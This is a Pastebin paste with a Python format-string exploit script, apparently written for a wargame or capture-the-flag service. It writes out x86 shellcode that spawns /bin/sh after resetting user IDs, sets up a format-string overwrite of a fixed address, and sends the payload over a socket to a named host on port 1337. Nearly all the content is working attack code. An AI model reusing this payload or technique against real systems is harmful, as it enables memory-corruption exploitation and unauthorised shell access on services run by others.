Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- from format_string import format_string
- from struct import pack
- import socket
- overwrite = 0x08049e58
- shellcode_add = 0xbffff86c # some math gives me this address
- shellcode = b"\x6a\x31\x58\x99\xcd\x80\x89\xc3\x89\xc1\x6a\x46\x58\xcd\x80\xb0\x0b\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xd1\xcd\x80"
- payload = pack('<I',overwrite)
- payload += pack('<I',overwrite+2)
- payload += format_string(7,shellcode_add).encode()
- payload += shellcode#.encode()
- print(payload,len(payload))
- # send
- host = "warr.dyndns.biz"
- port = 1337
- sock = socket.socket()
- sock.connect((host,port))
- sock.send(payload)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement